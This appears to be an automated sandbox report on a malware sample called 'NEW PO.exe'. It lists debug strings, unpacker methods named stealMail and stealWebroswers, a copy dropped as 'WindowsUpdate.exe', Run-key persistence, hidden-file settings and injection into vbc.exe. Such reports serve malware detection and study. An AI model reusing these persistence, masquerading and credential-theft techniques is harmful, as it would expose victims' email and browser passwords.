Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: ntasn1.pdb= source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: rasman.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: fastprox.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: NEW PO.exe, 00000007.00000000.312477071.0000000000ED0000.00000004.00000001.sdmp
Source:	Binary string: wbemsvc.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: winrnr.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdb source: NEW PO.exe, 00000007.00000002.366473803.0000000007337000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.340203819.00000000054C0000.00000004.00000001.sdmp
Source:	Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000016.00000000.399740135.0000000000400000.00000040.00000001.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: onfiguration.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: System.pdb source: NEW PO.exe, 00000007.00000002.366473803.0000000007337000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: ore.ni.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: pnrpnsp.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: ore.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdbi source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: WMINet_Utils.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: NEW PO.PDB source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Runtime.Remoting.pdb source: NEW PO.exe, 00000007.00000002.366422934.00000000072F0000.00000004.00000001.sdmp
Source:	Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: .pdbI source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: .pdb source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: comctl32.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wbemprox.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: ws2_32.pdbA source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: edputil.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.11.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.6.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.38.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.38.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.38.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.38.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.21.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.21.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.21.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.21.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.16.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.16.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.16.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.16.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.26.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.26.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.26.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.26.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.4.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.4.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.4.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.NEW PO.exe.400000.4.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.NEW PO.exe.400000.0.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.NEW PO.exe.400000.0.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.NEW PO.exe.400000.0.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.NEW PO.exe.400000.0.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.2.WindowsUpdate.exe.400000.0.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.4.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.11.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, Form1.cs	.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, Form1.cs	.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, Form1.cs	.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 16.0.WindowsUpdate.exe.400000.16.unpack, Form1.cs	.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 0_2_00EB7A8C pushfd ; ret	0_2_00EB7A8D
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 0_2_0318F278 push esp; retf	0_2_0318F279
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_00607A8C pushfd ; ret	7_2_00607A8D
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_00DEE674 push esp; ret	7_2_00DEE679
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_04F7AC12 pushfd ; ret	7_2_04F7AC21
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00442871 push ecx; ret	10_2_00442881
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00442A90 push eax; ret	10_2_00442AA4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00442A90 push eax; ret	10_2_00442ACC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00446E54 push eax; ret	10_2_00446E61
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_00411879 push ecx; ret	11_2_00411889
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_004118A0 push eax; ret	11_2_004118B4
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_004118A0 push eax; ret	11_2_004118DC
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_00787A8C pushfd ; ret	15_2_00787A8D
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_00FBF278 push esp; retf	15_2_00FBF279
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_050D7118 push eax; retn 050Bh	15_2_050D7309
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_050D8822 push esp; iretd	15_2_050D8829
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 16_2_00717A8C pushfd ; ret	16_2_00717A8D
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 16_2_011441E3 push edi; retn 0002h	16_2_011441F2
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 16_2_0114E673 push esp; ret	16_2_0114E679

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_004422C7 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_004422C7

Source: initial sample	Static PE information: section name: .text entropy: 7.88873846261
Source: initial sample	Static PE information: section name: .text entropy: 7.88873846261

Source: C:\Users\user\Desktop\NEW PO.exe

File created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe

Jump to dropped file

Source: C:\Users\user\Desktop\NEW PO.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update			Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Changes the view of files in windows explorer (hidden files and folders)

Show sources

Source: C:\Users\user\Desktop\NEW PO.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_00441975 memset,wcscpy,memset,wcscpy,wcscat,wcscpy,wcscat,wcscpy,wcscat,GetModuleHandleW,LoadLibraryExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_00441975

Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NEW PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
